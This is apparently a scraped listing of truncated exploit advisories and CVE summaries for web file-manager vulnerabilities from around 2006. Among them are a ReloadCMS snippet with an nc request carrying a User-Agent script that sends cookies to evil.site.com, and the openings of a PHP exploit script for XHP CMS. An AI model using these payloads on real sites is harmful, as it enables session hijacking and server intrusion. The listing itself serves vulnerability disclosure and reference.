filemanagerrem.txt

Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : FileManager Site : http://www.knusperleicht.at Code : $dwldownloadpath = "downloads"; $dwlincludepath = "dwl/";...

quickie.txt

Kurdish Security Quickie Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack &...

CVE-2006-3987

Multiple PHP remote file inclusion vulnerabilities in index.php in Knusperleicht FileManager 1.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 dwldownloadpath or 2 dwlincludepath parameters...

CVE-2006-3987

Multiple PHP remote file inclusion vulnerabilities in index.php in Knusperleicht FileManager 1.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 dwldownloadpath or 2 dwlincludepath parameters...

CVE-2006-3987

The CVE-2006-3987 entries describe multiple PHP remote file inclusion vulnerabilities in Knusperleicht FileManager 1.2 and earlier. The issue arises in index.php where an attacker can supply a URL in the dwl_download_path or dwl_include_path parameters, enabling remote code execution. Connected d...

[Kurdish Security # 20 ] Quickie Remote Command Execution

Kurdish Security Quickie Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack &...

plesk800.txt

Product: Plesk control panel Version: alert; Credits INVENT...

CVE-2006-3737

CVE-2006-3737 describes a cross-site scripting (XSS) vulnerability in the filemanager/filemanager.php component of the SWsoft Plesk control panel (version 8.0 and earlier). The issue arises when an authenticated user supplies a crafted file parameter, allowing injection of arbitrary web script or...

ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...

Design/Logic Flaw

Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...

CVE-2006-1371

Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...

CVE-2006-1371

CVE-2006-1371 affects XHP CMS

CVE-2006-1371

Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...

XHP CMS 0.5 - upload Remote Command Execution

XHP CMS 0.5 - upload Remote Command Execution !/usr/bin/php -q -d shortopentag=on 126 $re...

XHP CMS 0.5 - 'upload' Remote Command Execution

!/usr/bin/php -q -d shortopentag=on 126 $...

XHP CMS <= 0.5 (upload) Remote Command Execution Exploit

Exploit for unknown platform in category web applications ======================================================== XHP CMS = 0.5 upload Remote Command Execution Exploit ======================================================== !/usr/bin/php -q -d shortopentag=on ? echo "XHP CMS = 0.5 remote cmmnds...

XHP CMS &lt;= 0.5 (upload) Remote Command Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "XHP CMS = 0.5 remote cmmnds xctn\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: "powered by XHP CMS"\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host...

FCKEditor 2.0 2.2 - FileManager connector.php Arbitrary File Upload

FCKEditor 2.0 2.2 - FileManager connector.php Arbitrary File Upload a short explaination: if a user cam call directly http://target/path/editor/filemanager/browser/default/connectors/php/connector.php he can upload malicious contempt on a target server, including arbitrary php code, and launch...

TYPO3 Security Bulletin

A bug has been discovered in MOC filemanager v. 0.7.1 and earlier: An offender may gain illegal read access to files on the server. Component Type: Third Party Extension. This extension is third party code that has not been submitted to the TYPO3 extension review process yet. The extension is not...

CVE-2005-1659

Cross-site scripting XSS vulnerability in filemanager.cpp in MyServer 0.8 allows remote attackers to inject arbitrary Javascript via a URL with a "..." triple dot followed by an onmouseover event...